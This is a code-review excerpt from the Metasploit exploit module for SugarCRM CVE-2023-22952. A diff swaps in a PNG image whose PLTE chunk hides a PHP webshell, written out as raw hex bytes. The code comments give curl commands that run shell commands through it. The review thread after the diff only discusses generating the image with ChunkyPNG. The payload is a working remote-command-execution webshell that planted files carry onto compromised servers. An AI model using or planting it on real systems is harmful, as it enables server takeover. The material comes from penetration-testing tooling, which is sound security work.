modules/exploits/multi/http/sugarcrm_webshell_cve_2023_22952.rb

```diff
@@ -12,9 +12,39 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::CmdStager
   include Msf::Exploit::FileDropper
 
-  # Base64 PNG webshell code. Credits to sw33t.0day
-  # <?php echo "#####"; passthru(base64_decode($_POST["c"])); echo "#####"; ?>
-  PNG_B64_WEBSHELL = 'iVBORw0KGgoAAAANSUhEUgAAABkAAAAUCAMAAABPqWaPAAAAS1BMVEU8P3BocCBlY2hvICIjIyMjIyI7IHBhc3N0aHJ1KGJhc2U2NF9kZWNvZGUoJF9QT1NUWyJjIl0pKTsgZWNobyAiIyMjIyMiOyA/PiD2GHg3AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAKklEQVQokWNgwA0YmZhZWNnYOTi5uHl4+fgFBIWERUTFxCXwaBkFQxQAADC+AS1MHloSAAAAAElFTkSuQmCC'.freeze
+  # PNG embedded tiny PHP webshell hidden in a PLTE chunk thats allows PHP command functions such as;
+  # passthru(),shell_exec(), exec() and system() as options for command execution.
+  #
+  # PHP Code: <?=$_GET[0](base64_decode($_POST[1]));?>
+  # Examples:
+  # echo -n 'ls -l' | base64 ==> bHMgLWw=
+  # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/webshell_cmd_base64.phar?0=passthru' -o -
+  # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/webshell_cmd_base64.phar?0=system' -o -
+  # curl -XPOST -d '1=bHMgLWw=' 'http://localhost/webshell_cmd_base64.phar?0=shell_exec' -o -
+  PNG_CMD_WEBSHELL = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52\x00\x00\x00\x0E"\
+                     "\x00\x00\x00\x14\x04\x03\x00\x00\x00\x4F\x2B\x11\x1F\x00\x00\x00\x2A\x50\x4C\x54"\
+                     "\x45\x3C\x3F\x3D\x24\x5F\x47\x45\x54\x5B\x30\x5D\x28\x62\x61\x73\x65\x36\x34\x5F"\
+                     "\x64\x65\x63\x6F\x64\x65\x28\x24\x5F\x50\x4F\x53\x54\x5B\x31\x5D\x29\x29\x3B\x3F"\
+                     "\x3E\x20\x20\x88\xDD\xEC\x6F\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x0E\xC4\x00"\
+                     "\x00\x0E\xC4\x01\x95\x2B\x0E\x1B\x00\x00\x00\x16\x49\x44\x41\x54\x08\x99\x63\x60"\
+                     "\x80\x02\x46\x65\xD7\xF4\xCE\xD5\x67\x19\x06\x19\x00\x00\x9D\xCB\x02\xD2\x8E\xD6"\
+                     "\x6C\x6F\x00\x00\x00\x00\x49\x45\x4E\x44\xAE\x42\x60\x82".freeze
```

Comment:
Anytime we see binary data like this we will want to know how we can generate this. We don't allow arbitrary binary blobs we can't generate ourselves into the framework. I think you mentioned you were going to switch this over to be generated by ChunkyPNG but just something to note for future.

Reply:
@gwillcox-r7 As discussed on Slack, I will raise a PR to create a `mixin` using `ChunkyPNG` that will allow the generation of these webshells in PNG.

Reply:
See https://github.com/rapid7/metasploit-framework/pull/17507/commits/44ed254dde24d65518e63d2a5c791f605ff666e1